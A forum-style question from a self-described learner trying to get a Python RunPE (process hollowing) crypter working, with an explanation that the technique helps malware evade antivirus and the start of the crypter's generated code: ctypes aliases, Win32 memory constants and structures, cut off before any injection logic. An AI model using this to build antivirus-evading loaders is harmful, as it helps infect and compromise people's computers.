I have to learn how to implement RunPE in Python (for educational purposes).
However, since I don't know much about this field, I tried to modify the source code to make these projects work (because in fact none of the Python RunPE projects published on GitHub currently work). So I decided to train on this project: https://github.com/oueldz4/runpe
First, to be clear, I need to explain what this is. RunPE is the generic name of a technique used by many malware families.
This technique consists of launching a new process in a suspended state, then
replacing the memory contents of the suspended executable, and finally
resuming the process. This allows you to run a complete executable
without having to write it to disk. This avoids detection by the
antivirus.
So, as you can see, this method is used to infect computers without being detected by antivirus. However, in my case, I want to carry out this educational project. The world of security interests me a lot, and understanding these mechanisms really helps me avoid infecting myself by downloading files from the Internet.
Let's get back to my problem.
The encryption program (crypter) ultimately outputs the following code:

#!/usr/bin/env python
# This script uses the runpe technique to bypass AV detection
# The payload it contains, is encrypted each time with a random key
# INSTALL pefile and ctypes packages
# Note: izip exists only in Python 2; this script is Python 2 code
from itertools import cycle, izip
import sys, pefile
import ctypes

# Win32 type aliases used by the ctypes structures and calls below
BYTE = ctypes.c_ubyte
WORD = ctypes.c_ushort
DWORD = ctypes.c_ulong
LPSTR = ctypes.c_char_p
HANDLE = ctypes.c_void_p

# Win32 constants
CREATE_SUSPENDED = 0x0004
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [
        ('hProcess', HANDLE),
        ('hThread', HANDLE),
        ('dwProcessId', DWORD),
        ('dwThreadId', DWORD),
    ]

class STARTUPINFO(ctypes.Structure):
    _fields_ = [
        ('cb', DWORD),
        ('lpReserved', LPSTR),
        ('lpDesktop'